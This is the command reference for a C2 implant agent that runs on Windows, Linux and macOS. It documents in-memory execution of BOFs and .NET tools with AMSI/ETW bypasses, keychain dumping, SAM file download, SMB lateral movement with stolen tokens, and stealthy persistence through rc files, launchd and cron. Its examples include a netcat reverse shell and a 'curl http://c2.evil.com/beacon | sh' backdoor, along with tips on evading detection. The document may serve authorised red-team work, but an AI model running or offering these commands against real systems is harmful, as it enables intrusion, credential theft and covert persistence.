Command Reference

46 commands available across Windows, Linux, and macOS.

Windows Linux macOS

Showing 46 commands

bof execution

Win

Execute a Beacon Object File (BOF) with arguments

Syntax

bof <path_to_bof.o> [arguments...]
bof <path_to_bof.o>                       # Execute BOF without arguments
bof <path_to_bof.o> arg1 arg2             # Execute with string arguments
bof <path_to_bof.o> -i:123 -s:hello        # Execute with typed arguments

Examples

bof /path/to/whoami.x64.o bof /path/to/dir.x64.o C:\Windows\System32 bof /path/to/netuser.x64.o -w:Administrator -w:DOMAIN bof /path/to/portscan.x64.o -s:192.168.1.0/24 -i:445

Details

Executes a Beacon Object File (BOF) in the agent's memory: - First argument must be path to a .o (COFF) file - Supports x64 and x86 BOF files - Arguments can be passed in different formats: * Plain strings: treated as string arguments * -s:value : String argument * -w:value : Wide string (Unicode) argument * -i:value : Integer argument (32-bit) * -I:value : Integer argument (64-bit) * -z:value : Binary data (base64 encoded) * -Z:value : Binary data with size prefix - BOFs run in the agent's process memory - Output is captured and returned - Crashes in BOFs are isolated (with async mode)

bof-async execution

Win

Execute a BOF asynchronously in a separate thread

Syntax

bof-async <path_to_bof.o> [arguments...]
bof-async <path_to_bof.o>                 # Execute async without arguments
bof-async <path_to_bof.o> arg1 arg2       # Execute async with arguments

Examples

bof-async /path/to/long_running.x64.o bof-async /path/to/scanner.x64.o 192.168.1.0/24 1-1000 bof-async /path/to/keylogger.x64.o 60

Details

Executes a BOF asynchronously in a separate thread: - Same argument format as regular 'bof' command - BOF runs in background without blocking agent - Each async BOF gets a unique job ID - Use 'bof-jobs' to list running BOFs - Use 'bof-output <job_id>' to get output - Use 'bof-kill <job_id>' to terminate - Crashes won't affect the main agent process

bof-jobs execution

Win

List all running asynchronous BOF jobs

Syntax

bof-jobs

Examples

bof-jobs

Details

Shows all currently running asynchronous BOF jobs: - Lists job ID, BOF name, status, and start time - Shows memory usage for each job - Indicates if output is available

bof-kill execution

Win

Terminate an async BOF job

Syntax

bof-kill <job_id>

Examples

bof-kill 1 bof-kill 3

Details

Forcefully terminates an async BOF job: - Requires valid job ID from 'bof-jobs' - Cleans up allocated memory - Returns any remaining output - Job cannot be restarted

bof-output execution

Win

Retrieve output from an async BOF job

Syntax

bof-output <job_id>

Examples

bof-output 1 bof-output 5

Details

Retrieves accumulated output from an async BOF job: - Requires valid job ID from 'bof-jobs' - Returns all output since last retrieval - Does not terminate the job

cat file

Win Linux macOS

Display file contents with optional filtering

Syntax

cat <file>                     # Display entire file
cat <file> -f <pattern>        # Filter lines containing pattern (case-sensitive)
cat <file> -i <pattern>        # Case-insensitive filter

Examples

cat /etc/passwd cat config.txt -f error # Show lines containing 'error' (case-sensitive) cat log.txt -i warning # Case-insensitive search for 'warning' cat data.csv -f ,admin, # Find lines with ',admin,' cat app.log -f ERROR:* # Lines starting with 'ERROR:' cat test.txt -i *warn* # Lines containing 'warn' anywhere (case-insensitive) cat file.txt -f *success # Lines ending with 'success' cat data.log -f user?id # Match 'userid' or 'user-id' etc (? = any single char) cat error.log -f *[ERROR]* # Lines containing '[ERROR]' anywhere

Details

Displays file contents with optional filtering: - Reads and outputs entire file by default - Use -f for case-sensitive pattern matching - Use -i for case-insensitive pattern matching - Supports wildcards: * = matches any sequence of characters ? = matches exactly one character *pattern* = matches pattern anywhere in line - Pattern matching searches each line - File must be readable by the agent process - Output includes line numbers when filtering (format: linenum:content)

cd file

Win Linux macOS

Change working directory

Syntax

cd <path>

Examples

cd C:\Users cd /home/user cd ..

Details

Changes current working directory on target system

clear utility

Win Linux macOS

Clear pending commands for the agent

Syntax

clear

Examples

clear

Details

Clears all pending commands for the agent except for file transfers: - Removes non-file-transfer commands from queue - Keeps 'upload' and 'download' commands intact - Useful for canceling queued commands

cna-list utility

Win Linux macOS

List loaded CNA scripts and their commands

Syntax

cna-list

Examples

cna-list

Details

Shows all currently loaded CNA scripts and the commands they provide

cna-load utility

Win Linux macOS

Load a Cobalt Strike Aggressor (CNA) script

Syntax

cna-load <path_to_cna_file>

Examples

cna-load /path/to/bof.cna cna-load ~/tools/trustedsec-bofs/bof.cna

Details

Loads a Cobalt Strike Aggressor (CNA) script file and registers its commands. This allows you to use BOF collections that come with CNA scripts. The interpreter will: - Parse beacon_command_register declarations - Extract alias definitions - Map commands to their BOF implementations - Auto-locate BOF files relative to the CNA script Supported CNA features: - beacon_command_register - beacon_inline_execute - alias definitions - bof_pack argument packing - readbof BOF file loading - Basic conditionals (iff) - Logging (btask, blog, berror) Note: This is a subset implementation of the CNA language focused on BOF integration.

download file

Win Linux macOS

Download a file from the target system

Syntax

download <filename>

Examples

download C:\Windows\System32\config\SAM ./sam.bak download /etc/passwd ./passwd.txt

Details

Retrieves a file from target system: - Remote file must exist and be readable

env info

Win Linux macOS

Display, set, or remove environment variables

Syntax

env                        # Display all environment variables
env <VAR_NAME>            # Display specific variable
env <VAR_NAME>=<VALUE>    # Set environment variable
env -u <VAR_NAME>         # Unset/remove environment variable

Examples

env # Show all environment variables env PATH # Show PATH variable env CUSTOM_VAR=test # Set CUSTOM_VAR to 'test' env -u CUSTOM_VAR # Remove CUSTOM_VAR

Details

Manages environment variables in the current session: - No arguments: displays all environment variables - Single argument (VAR_NAME): displays specific variable value - VAR_NAME=VALUE format: sets environment variable for the session - -u: removes an environment variable - Changes are session-specific and don't persist after agent restart

execute-assembly execution

Win

Alias for inline-assembly command

Syntax

execute-assembly <path_to_assembly> [arguments...]

Examples

execute-assembly /path/to/Rubeus.exe kerberoast execute-assembly /path/to/Seatbelt.exe -group=all

Details

Alias for inline-assembly command. See 'help inline-assembly' for full documentation. This alias is provided for compatibility with other C2 frameworks. All functionality is identical to inline-assembly.

exit utility

Win Linux macOS

Gracefully exit/kill the agent

Syntax

exit

Examples

exit

Details

Gracefully stops the agent: - Cleans up active jobs - Removes temporary files - Stops running services - Exits process cleanly

hash token

Win Linux macOS

Calculate MD5 or SHA256 hash of files

Syntax

hash <file_path> [algorithm]

Examples

hash /etc/passwd hash /etc/passwd sha256 hash /etc/passwd md5 hash /etc/passwd all hash C:\Windows\System32\notepad.exe hash ./document.pdf all hash config.json md5

Details

Calculate cryptographic hashes of files on the target system. Algorithms: - md5: Calculate MD5 hash (128-bit) - sha256: Calculate SHA256 hash (256-bit) [DEFAULT] - all: Calculate both MD5 and SHA256 Features: - Supports absolute and relative paths - Works on all operating systems - Efficient streaming for large files - Clear error reporting

hashdir utility

Win Linux macOS

Recursively hash files in a directory

Syntax

hashdir <directory_path> [algorithm] [pattern]

Examples

hashdir /var/log hashdir /bin md5 hashdir C:\Windows\System32 sha256 *.exe hashdir ./downloads all *.pdf hashdir /home/user sha256 *.conf

Details

Recursively calculate hashes for multiple files in a directory. Parameters: - directory_path: Target directory to scan - algorithm: Hash algorithm (md5/sha256) [DEFAULT: sha256] - pattern: File pattern to match [DEFAULT: *] Features: - Recursive directory traversal - Pattern matching for selective hashing - Batch processing with progress - Error handling for inaccessible files Output includes: - Hash value and relative file path - Summary of files processed - Error count for failed files

help utility

Win Linux macOS

Show general help or details for a specific command

Syntax

help                     # Show all commands with a short description
help <command>           # Show detailed help for a specific command

Examples

help help upload help socks

Details

Client-side help viewer: - 'help' prints all available commands with a short description. - 'help <command>' prints detailed help using the fields in commands.toml: name, description, syntax, examples, and help. This never goes to the server and is rendered instantly in the terminal.

inline-assembly utility

Win

Execute a .NET assembly in memory without creating new processes

Syntax

inline-assembly <path_to_assembly> [arguments...]
inline-assembly <path_to_assembly>                    # Execute without arguments
inline-assembly <path_to_assembly> arg1 arg2          # Execute with arguments
inline-assembly <path_to_assembly> --amsi             # Enable AMSI bypass
inline-assembly <path_to_assembly> --etw              # Enable ETW bypass
inline-assembly <path_to_assembly> --amsi --etw       # Enable both bypasses
inline-assembly <path_to_assembly> --revert-etw       # Revert ETW after execution
inline-assembly <path_to_assembly> --app-domain NAME  # Specify AppDomain name

Examples

inline-assembly /path/to/Seatbelt.exe -group=all inline-assembly /path/to/SharpUp.exe inline-assembly /path/to/Rubeus.exe --amsi kerberoast inline-assembly /path/to/SharpHound.exe --etw -c all inline-assembly /path/to/Mimikatz.exe --amsi --etw coffee inline-assembly /path/to/Watson.exe --app-domain MyDomain inline-assembly /path/to/Custom.exe --amsi --revert-etw

Details

Executes .NET assemblies in memory without touching disk: OPTIONS: --amsi Enable AMSI bypass before execution --etw Enable ETW bypass before execution --revert-etw Revert ETW patches after execution --app-domain <name> Specify AppDomain name (default: InlineAssembly) EXECUTION METHODS (Windows): 1. C# wrapper compilation for output capture 2. PowerShell fallback if csc.exe unavailable 3. Direct CLR hosting via ICLRRuntimeHost 4. Windows API pipe redirection for stdout/stderr EXAMPLES: # Safe execution (no bypasses) inline-assembly /path/to/Seatbelt.exe -group=all # With AMSI bypass for tools that need it inline-assembly /path/to/Rubeus.exe --amsi kerberoast # With ETW bypass for monitoring evasion inline-assembly /path/to/SharpHound.exe --etw -c all # With both bypasses for high-risk tools inline-assembly /path/to/Mimikatz.exe --amsi --etw coffee # Custom AppDomain inline-assembly /path/to/Tool.exe --app-domain CustomDomain

inline-assembly-async utility

Win

Execute a .NET assembly asynchronously in a separate thread

Syntax

inline-assembly-async <path_to_assembly> [arguments...]
inline-assembly-async <path_to_assembly>              # Execute async without arguments
inline-assembly-async <path_to_assembly> arg1 arg2    # Execute async with arguments
inline-assembly-async <path_to_assembly> --amsi       # Async with AMSI bypass
inline-assembly-async <path_to_assembly> --etw        # Async with ETW bypass

Examples

inline-assembly-async /path/to/SharpHound.exe -c all inline-assembly-async /path/to/LongRunning.exe inline-assembly-async /path/to/Scanner.exe --amsi 192.168.1.0/24 inline-assembly-async /path/to/Monitor.exe --etw --app-domain Monitor

Details

Executes .NET assemblies asynchronously in background: FEATURES: - Same capabilities as inline-assembly but non-blocking - Runs in separate thread without blocking agent - Each async execution gets a unique job ID - Output buffered for later retrieval OPTIONS: Same as inline-assembly: --amsi Enable AMSI bypass --etw Enable ETW bypass --revert-etw Revert ETW patches --app-domain <name> Specify AppDomain name JOB MANAGEMENT: - Use 'inline-assembly-jobs' to list running assemblies - Use 'inline-assembly-output <job_id>' to get output - Use 'inline-assembly-kill <job_id>' to terminate EXAMPLES: # Long-running collection tool inline-assembly-async /path/to/SharpHound.exe -c all # Background scanner with AMSI bypass inline-assembly-async /path/to/Scanner.exe --amsi 10.0.0.0/8 # Monitor with ETW bypass inline-assembly-async /path/to/EventMon.exe --etw

inline-assembly-jobs utility

Win

List all running asynchronous assembly jobs

Syntax

inline-assembly-jobs

Examples

inline-assembly-jobs

Details

Shows all currently running asynchronous .NET assembly jobs: USAGE: inline-assembly-jobs # List all jobs NOTES: - Jobs persist until output is retrieved or killed - Completed jobs show 'Completed' status - Failed jobs show error information

inline-assembly-jobs-clean utility

Win

Clean up completed, killed, or failed assembly jobs from memory

Syntax

inline-assembly-jobs-clean                # Clean all non-running jobs
inline-assembly-jobs-clean <job_id>       # Clean specific job (if not running)

Examples

inline-assembly-jobs-clean inline-assembly-jobs-clean inline_asm_1755706455548 inline-assembly-jobs-clean 1755706455548

Details

Removes completed, killed, failed, or timed-out assembly jobs from memory: FEATURES: - Cleans up job tracking to free memory - Prevents job list from growing too large - Cannot clean running jobs (must kill first) - Supports partial job ID matching USAGE: inline-assembly-jobs-clean # Remove ALL non-running jobs inline-assembly-jobs-clean <job_id> # Remove specific job if not running EXAMPLES: # Clean all completed/killed/failed jobs inline-assembly-jobs-clean # Clean specific job by ID inline-assembly-jobs-clean inline_asm_1755706455548 # Clean using partial ID inline-assembly-jobs-clean 1755706455548

inline-assembly-jobs-stats utility

Win

Display statistics about assembly jobs

Syntax

inline-assembly-jobs-stats

Examples

inline-assembly-jobs-stats

Details

Shows statistical summary of all assembly jobs in memory: DISPLAYED INFORMATION: - Total number of jobs - Count of running jobs - Count of completed jobs - Count of failed jobs - Count of killed jobs - Count of timeout jobs USAGE: inline-assembly-jobs-stats # Show job statistics

inline-assembly-kill process

Win

Terminate an async assembly job

Syntax

inline-assembly-kill <job_id>

Examples

inline-assembly-kill 1 inline-assembly-kill 3

Details

Forcefully terminates an async assembly job: USAGE: inline-assembly-kill <job_id> # Kill specific job EXAMPLES: inline-assembly-kill 1 # Terminate job 1 inline-assembly-kill 5 # Terminate job 5

inline-assembly-output utility

Win

Retrieve output from an async assembly job

Syntax

inline-assembly-output <job_id>

Examples

inline-assembly-output 1 inline-assembly-output 3

Details

Retrieves accumulated output from an async assembly job: USAGE: inline-assembly-output <job_id> # Get output from specific job EXAMPLES: inline-assembly-output 1 # Get output from job 1 inline-assembly-output 5 # Get output from job 5

inline-execute execution

Win

Alias for inline-assembly command

Syntax

inline-execute <path_to_assembly> [arguments...]

Examples

inline-execute /path/to/SharpUp.exe inline-execute /path/to/Watson.exe

Details

Alias for inline-assembly command. See 'help inline-assembly' for full documentation. This alias is provided as a shorter alternative to inline-assembly. All functionality is identical to inline-assembly.

jobkill utility

Win Linux macOS

Kill an active file transfer job

Syntax

jobkill <job_id>

Examples

jobkill 1 jobkill 3

Details

Terminates an active file transfer job: - Requires a valid job ID from 'jobs' command - Stops both uploads and downloads - Cleans up any partial transfers - Job ID must be a number

jobs utility

Win Linux macOS

List all active file transfer jobs

Syntax

jobs

Examples

jobs

Details

Shows all active file transfers: - Lists ongoing uploads and downloads - Shows progress for each transfer - Displays job IDs for tracking

keychain utility

macOS

Access and manipulate macOS Keychain items

Syntax

keychain list
keychain dump [--keychain <keychain_path>]
keychain search [--service <service>] [--account <account>] [--label <label>]
keychain add --service <service> --account <account> --password <password>
keychain delete --service <service> --account <account>
keychain export --keychain <path> --output <file>
keychain unlock --keychain <path> --password <password>

Examples

keychain list keychain dump keychain dump --keychain login.keychain-db keychain search --service gmail keychain search --account admin@company.com keychain search --service outlook --account user@outlook.com keychain add --service myapp --account admin --password SecretPass123 keychain delete --service myapp --account admin keychain export --keychain login.keychain-db --output /tmp/keychain.txt keychain unlock --keychain login.keychain-db --password MyPassword

Details

Accesses and manipulates macOS Keychain: ACTIONS: 1. LIST - Show available keychains: - Lists all keychains in search path - Shows default login keychain - Checks accessibility of each keychain - Lists keychains in ~/Library/Keychains/ 2. DUMP - Extract keychain contents: - Options: --keychain <path> Specific keychain (default: login keychain) - Dumps generic passwords - Dumps internet passwords - Lists certificates - Note: Keychain must be unlocked - Passwords shown in plaintext when accessible 3. SEARCH - Find specific items: - Options: --service <name> Service/application name --account <name> Account username --label <label> Item label - Searches both generic and internet passwords - Shows password if accessible - Can combine search criteria 4. ADD - Create keychain item: - Options: --service <name> Service name (required) --account <name> Account name (required) --password <pass> Password (required) - Adds generic password entry - Allows access by all applications 5. DELETE - Remove keychain item: - Options: --service <name> Service name --account <name> Account name - At least one option required - Removes matching items 6. EXPORT - Export keychain data: - Options: --keychain <path> Source keychain (required) --output <file> Output file (required) - Attempts PKCS12 export first - Falls back to text dump if needed - Exported data includes passwords 7. UNLOCK - Unlock a keychain: - Options: --keychain <path> Keychain to unlock (default: login) --password <pass> Keychain password (required) - Allows access to protected items - Unlock persists for session KEYCHAIN TYPES: - login.keychain-db: User's default keychain - System.keychain: System-wide keychain (requires root) - iCloud Keychain: Synced items (limited access) - Custom keychains: User-created keychains COMMON PASSWORDS FOUND: - Web passwords (Safari, Chrome) - Email account passwords - WiFi passwords (System keychain) - Application passwords - SSH keys passphrases - Certificate private keys - Token/API keys SECURITY NOTES: - Modern macOS requires user approval for keychain access - Some items protected by TouchID/password - System keychain requires root access - Keychain dumping logged by endpoint security - TCC protections may prevent access OPERATIONAL TIPS: - Unlock keychain first for full access - Search for specific services of interest - Export for offline analysis - Check all available keychains - Look for plaintext passwords in dumps EXAMPLES: # List all keychains keychain list # Dump default keychain (must be unlocked) keychain dump # Search for email passwords keychain search --service gmail keychain search --service outlook keychain search --service mail # Search for specific account keychain search --account admin@target.com # Add backdoor credential keychain add --service backdoor --account admin --password infected # Export for offline analysis keychain export --keychain login.keychain-db --output /tmp/creds.txt # Unlock with known password keychain unlock --password UserPassword123

link network

Win

Link to a remote agent for lateral movement

Syntax

link <protocol> <target_host> [options]
link smb <target_host> [pipe_name]    # Connect via SMB named pipe

Examples

link smb 192.168.1.50 spoolss link smb dc01.corp.local netlogon link smb localhost customPipe link smb 10.0.0.5

Details

Connects to a link agent running on a remote host for lateral movement. This command enables lateral movement by linking an HTTPS "edge" agent to a "link" agent deployed on another machine. The link agent communicates back to the server through the edge agent, creating a chain. PROTOCOLS: smb Connect via SMB named pipe (port 445) Future: Additional protocols will be added (tcp, etc.) REQUIREMENTS: - The calling agent must be an HTTPS (edge) agent - Network access to the target host on the protocol's port - Valid credentials for authentication (use token impersonation if needed) - A link agent must be running on the target and listening SMB PIPE NAME: - If not specified, defaults to 'spoolss' - View configured pipe names in the Listeners panel (View > Show Listeners) - Common pipes: spoolss, netlogon, lsarpc, samr, browser - Custom pipe names can be specified when building the SMB payload ARCHITECTURE: [Server] <--HTTPS--> [Edge Agent] <--Protocol--> [Link Agent] The edge agent acts as a relay, forwarding encrypted traffic between the server and the link agent. All communication is end-to-end encrypted - the edge agent cannot read the link agent's traffic. AUTHENTICATION: Connections use the current security context. To connect with different credentials, first impersonate the appropriate token: token steal 1234 domain-admin # Steal domain admin token link smb dc01.corp.local spoolss # Connect as domain admin Or use make-token/token create for explicit credentials: token create CORP\admin P@ssw0rd admin-tok token use admin-tok link smb fileserver.corp.local spoolss MULTI-HOP CHAINS: Link agents can themselves link to other link agents, creating multi-hop chains for deep network penetration: Server <-> EdgeAgent <-> LinkAgent1 <-> LinkAgent2 <-> LinkAgent3 EXAMPLES: # Basic link to an SMB agent link smb 192.168.1.50 spoolss # Link using FQDN link smb dc01.corp.local netlogon # Link with token impersonation for authentication token steal 1752 domain-admin link smb 10.0.0.100 spoolss # Link using default pipe name (spoolss) link smb workstation01 TROUBLESHOOTING: - "Access denied": Check credentials/token context - "Pipe not found": Verify link agent is running and pipe name matches - "Network path not found": Check target host is reachable - "Connection timeout": Firewall may be blocking traffic

links network

Win

List all active SMB link connections from this agent

Syntax

links

Examples

links

Details

Lists all active SMB pipe connections from this edge agent. OUTPUT COLUMNS: ID Routing ID for the linked agent (use with 'unlink') Target Pipe path of the connected SMB agent Status Connection status (connected, disconnected) Linked Timestamp when the link was established USAGE: Use this command to see which SMB agents are currently connected through this edge agent. The routing ID shown can be used with 'unlink' to disconnect specific agents. EXAMPLE OUTPUT: ID Target Status Linked --- -------------------------- ---------- ------------------- 1 \\192.168.1.50\pipe\spoolss connected 2024-01-15 10:30:00 2 \\dc01\pipe\netlogon connected 2024-01-15 10:32:15

ls file

Win Linux macOS

List directory contents with optional filtering

Syntax

ls [-a] [-h] [-R] [--max-depth=N] [--count] [-f pattern]... [-i pattern]... [--exclude pattern]... [path]

Examples

ls ls -a ls /etc ls -h ls -R /home/user ls -ahR ~/Documents ls -R --max-depth=2 ls -R --max-depth=1 /var ls -ahR --max-depth=3 ls --count ls -R --count ls -a --count ls -R --max-depth=2 --count ls -f .log --count ls -f .go -f .md ls -f .js -f .ts --exclude node_modules ls -R --exclude .git --exclude target ls -a -f .config ls -i CONFIG /etc ls -hR -f .go /usr/src ls -R --max-depth=2 -f .log ls --filter test ls --filter-ignore readme

Details

Lists contents of specified directory with optional filtering: - No path shows current directory - Supported flags: -a : Show all files including hidden files (files starting with '.') -h : Human-readable file sizes (KB, MB, GB instead of bytes) -R : Recursive listing (includes subdirectories) --max-depth=N : Limit recursion depth (0=current dir only, works with -R) --count : Show only counts of files/directories instead of listing them -f <pattern> or --filter <pattern> : Filter files by pattern (case-sensitive) Can be used multiple times for OR matching -i <pattern> or --filter-ignore <pattern> : Filter files by pattern (case-insensitive) Can be used multiple times for OR matching --exclude <pattern> : Exclude files/directories matching pattern Can be used multiple times Excluded directories are not traversed in recursive mode - Flags can be combined (e.g., -ahR --count -f pattern) - Filters use substring matching (shows files containing the pattern) - Multiple -f or -i flags show files matching ANY pattern (OR logic) - Exclusions are applied after inclusion filters - By default, hidden files (starting with '.') are not shown unless -a is used - When using -R without -a, hidden directories are also skipped - --max-depth=0 shows only the current directory (no recursion) - --max-depth=1 shows current directory and immediate subdirectories - Without --max-depth, -R recurses unlimited depth - --count shows statistics instead of file listings - With filters, --count shows "Matching items" count Examples of multiple filters and exclusions: ls -f .go -f .md # Find all Go OR Markdown files ls -i test -i spec # Find files containing 'test' OR 'spec' (case-insensitive) ls -R --exclude node_modules # Recursive list, skip node_modules directories ls -f .js --exclude .min.js # Find .js files but not minified ones ls -R -f .log --exclude archive --exclude backup # Find logs, skip archive and backup dirs

persist persistence

Linux macOS

Establish persistence through various macOS mechanisms

Syntax

persist rc --user <username> --command <cmd> [--files .zshrc,.bash_profile]
persist launch --name <service> --command <cmd> [--user|--system] [--interval <seconds>]
persist login --name <name> --path <app_path>
persist periodic --command <cmd> --frequency <daily|weekly|monthly>

Examples

persist rc --command '/tmp/backdoor.sh' persist rc --user admin --command 'nc -e /bin/sh 10.0.0.1 4444' persist rc --command './agent' --files .zshrc,.bash_profile,.profile persist launch --name com.apple.updater --command '/tmp/agent' --interval 3600 persist launch --name com.system.helper --command '/usr/local/bin/backdoor' --system persist login --name 'System Helper' --path /Applications/Helper.app persist periodic --command '/tmp/beacon.sh' --frequency daily

Details

Establishes persistence on macOS using multiple techniques: METHODS: 1. RC FILE PERSISTENCE (rc): - Modifies shell startup files (.zshrc, .bash_profile, .bashrc, .profile) - Executes payload when user opens terminal - Options: --user <username> Target specific user (default: current) --command <cmd> Command to persist (required) --files <list> Comma-separated RC files (default: all common ones) - Payload includes process check to avoid duplicates 2. LAUNCHAGENT/DAEMON (launch): - Creates persistent service using launchd - Options: --name <service> Service identifier (required) --command <cmd> Command to execute (required) --user Install as LaunchAgent (user-level) --system Install as LaunchDaemon (system-level, requires root) --interval <sec> Execution interval in seconds (default: 3600) - Creates plist in ~/Library/LaunchAgents or /Library/LaunchDaemons - Service starts at boot and runs periodically 3. LOGIN ITEM (login): - Adds application to user's login items - Options: --name <name> Display name for login item (required) --path <path> Path to application (required) - Uses osascript to add item - Note: Requires user approval on modern macOS (TCC) 4. PERIODIC SCRIPTS (periodic): - Adds to system periodic maintenance scripts - Options: --command <cmd> Command to execute (required) --frequency <period> daily, weekly, or monthly (required) - Installs in /etc/periodic/{daily,weekly,monthly}/ - Requires root privileges - Runs automatically via periodic maintenance OPERATIONAL NOTES: - RC persistence survives reboots and is stealthy - LaunchAgent/Daemon provides most reliable persistence - Login Items visible in System Preferences - Periodic scripts require root but very stealthy - Modern macOS may prompt for permissions (TCC) - SIP may prevent some persistence methods EXAMPLES: # Simple RC file backdoor persist rc --command 'curl http://c2.evil.com/beacon | sh' # LaunchAgent with custom interval persist launch --name com.adobe.update --command '/tmp/malware' --user --interval 300 # System-level LaunchDaemon (requires root) persist launch --name com.apple.security --command '/usr/local/bin/agent' --system # Add login item (visible to user) persist login --name 'Dropbox Helper' --path /Applications/Evil.app # Daily periodic task (requires root) persist periodic --command '/opt/backdoor/beacon' --frequency daily

persist-cron persistence

Linux

Manage cron-based persistence on Linux systems with multiple methods

Syntax

persist-cron <action> [options]
Actions:
add [--method <method>] [--user <user>] [--interval <time>] [--command <cmd>]
remove [--method <method>] [--user <user>]
list

Examples

persist-cron add --method spool --interval @hourly persist-cron add --method crond --interval '*/15 * * * *' persist-cron add --method periodic --interval @daily persist-cron add --method anacron persist-cron add --method all --command /tmp/.daemon persist-cron add persist-cron remove --method spool persist-cron remove --method all persist-cron list

Details

Manages cron-based persistence using multiple selectable methods for redundancy and stealth. METHODS: spool - User crontab files in /var/spool/cron/ crond - System-wide /etc/cron.d/ file periodic - Cron directories (/etc/cron.hourly, daily, weekly, monthly) anacron - Anacron for systems not always on all - Try all methods (default) ACTIONS: 1. ADD - Install cron persistence Uses selected method(s) to establish persistence: Method: spool - Direct manipulation of crontab files - Locations checked: • /var/spool/cron/crontabs/<user> • /var/spool/cron/<user> • /var/spool/cron/tabs/<user> - No crontab command used (stealthier) - Checks write permissions with unix.Access Method: crond - Creates file in /etc/cron.d/ - File named "system-check" (looks legitimate) - System-wide execution - Includes proper SHELL and PATH definitions Method: periodic - Creates scripts in cron directories - Maps intervals to appropriate directory: • @hourly → /etc/cron.hourly/ • @daily → /etc/cron.daily/ • @weekly → /etc/cron.weekly/ • @monthly → /etc/cron.monthly/ - Script named "system-update" - Executable bash scripts (755 permissions) Method: anacron - Modifies /etc/anacrontab - For systems not running 24/7 - Job named "system-maint" - 5-minute delay, daily execution Options: --method <method> Persistence method (default: all) --user <user> Target user (default: current) --interval <time> Execution interval (default: @hourly) --command <cmd> Command to run (default: current binary via /proc/self/exe) Interval formats: @reboot Run at startup @hourly Run every hour (randomized minute) @daily Run daily (randomized hour/minute) @weekly Run weekly (randomized day/hour/minute) @monthly Run monthly (randomized day/hour/minute) '*/15 * * * *' Standard cron format (every 15 minutes) '0 2 * * *' Daily at 2 AM 2. REMOVE - Clean cron persistence Removes persistence from selected method(s): Options: --method <method> Method to remove (default: all) --user <user> Target user (default: current) Cleanup targets by method: spool: User crontab files crond: /etc/cron.d/system-check periodic: Scripts in cron directories anacron: Entries in /etc/anacrontab all: All of the above 3. LIST - Show installed persistence Scans all locations for persistence: - Checks user crontabs for "Added by system at" comments - Looks for /etc/cron.d/system-check - Searches cron directories for system-update scripts - Scans anacrontab for system-maint entries - Reports all found persistence mechanisms STEALTH FEATURES: - Randomized execution times using Unix timestamp modulo - Legitimate-looking names (system-check, system-update, system-maint) - Timestamped comments for authenticity - Output redirected to /dev/null (prevents cron emails) - Direct file manipulation (avoids crontab command logging) - Uses unix.Access for permission checks (less noisy than stat) - Checks for existing entries to avoid duplicates SECURITY FEATURES: - Permission checking before write attempts - Proper file permissions (600 for user crons, 644 for system) - Falls back to /proc/self/exe or os.Args[0] for binary path - Handles missing users/paths gracefully - Returns detailed success/failure for each method REDUNDANCY: - Method "all" attempts every persistence technique - Multiple paths checked for each method - Continues trying other methods if one fails - Returns aggregated results showing what worked - Different methods work with different privilege levels EXAMPLES: # Default persistence (all methods, hourly) persist-cron add # Specific method with custom interval persist-cron add --method spool --interval '*/30 * * * *' # System-wide daily persistence persist-cron add --method crond --interval @daily --user root # Periodic execution with custom command persist-cron add --method periodic --interval @weekly --command /opt/backup.sh # Anacron for laptops/workstations persist-cron add --method anacron # Try everything with custom binary persist-cron add --method all --command /tmp/.daemon # Check what's installed persist-cron list # Remove specific method persist-cron remove --method spool # Clean everything persist-cron remove --method all OPERATIONAL NOTES: - No system binaries used (crontab, at, systemctl avoided) - Works across different Linux distributions - Some methods require elevated privileges: • spool: Usually works for current user • crond: Requires root or sudo • periodic: Requires root or sudo • anacron: Requires root or sudo - Method selection allows privilege-appropriate persistence - Test in controlled environment first - Always include cleanup in operational plans

ps process

Win Linux macOS

List running processes with optional filtering and detailed information

Syntax

ps                                      # Basic process list (PID, PPID, Name)
ps -v                                   # Verbose mode with command line and executable path
ps -x                                   # Extended mode with resource usage
ps -j                                   # Output in JSON format
ps --no-truncate                        # Show full names/paths without truncation
ps -f <pattern>                         # Filter by process name
ps -u <username>                        # Filter by username
ps -s <field>                           # Sort by field (cpu, mem, pid, name, user, time)
ps [flags...] [options...]              # Combine multiple flags and options

Examples

ps ps -v ps -x ps -v -x ps -j ps --no-truncate ps -v --no-truncate ps -f chrome ps -u root ps -s cpu ps -x -s mem

Details

Lists running processes on the target system with optional filtering and detailed information. TOKEN CONTEXT (Windows): When an impersonation token is active (via steal-token or make-token): - Process enumeration uses the impersonated user's privileges - May show different processes based on access rights - Hidden/protected processes may become visible with SYSTEM token - Process details (user, command line) depend on token privileges FLAGS: -v, --verbose Include command line arguments and executable path -x, --extended Include resource usage (CPU%, memory, threads, status, user) -j, --json Output in JSON format for parsing/scripting --no-truncate Don't truncate fields - show full process names, paths, and commands OPTIONS: -f, --filter <pattern> Filter processes by name (partial match, case-insensitive) -u, --user <username> Show only processes owned by specified user -s, --sort <field> Sort output by field SORT FIELDS: cpu Sort by CPU usage (highest first) mem Sort by memory usage (highest first) pid Sort by process ID (ascending) name Sort by process name (alphabetical) user Sort by username (alphabetical) time Sort by creation time (oldest first) OUTPUT COLUMNS: Basic mode: PID Process ID PPID Parent Process ID NAME Process name Extended mode (-x) adds: USER Process owner CPU% CPU usage percentage MEM% Memory usage percentage MEM(MB) Memory usage in megabytes THREADS Number of threads STATUS Process status (Running, Sleeping, Stopped, etc.) Verbose mode (-v) adds: EXECUTABLE Full path to executable COMMAND Full command line with arguments EXAMPLES WITH TOKENS: Without token: ps -x # Shows processes visible to current user With SYSTEM token: steal-token 1752 system ps -x # Shows ALL processes including protected ones ps -f lsass # Can now see details of protected processes rev2self # Revert token Combined with filtering: steal-token use admin ps -u SYSTEM # List all SYSTEM processes with admin token ps -f svchost -x # Detailed view of service hosts

pwd file

Win Linux macOS

Print working directory

Syntax

pwd

Examples

pwd

Details

Shows current working directory on target system

rekey utility

Win Linux macOS

Re-initialize client encryption and get new client ID

Syntax

rekey

Examples

rekey

Details

Forces the client to perform a new initialization handshake: - Gets new client ID - Resets encryption state - Re-establishes secure channel Use when encryption gets out of sync.

rev2self token

Win

Revert token impersonation and return to original security context

Syntax

rev2self

Examples

rev2self

Details

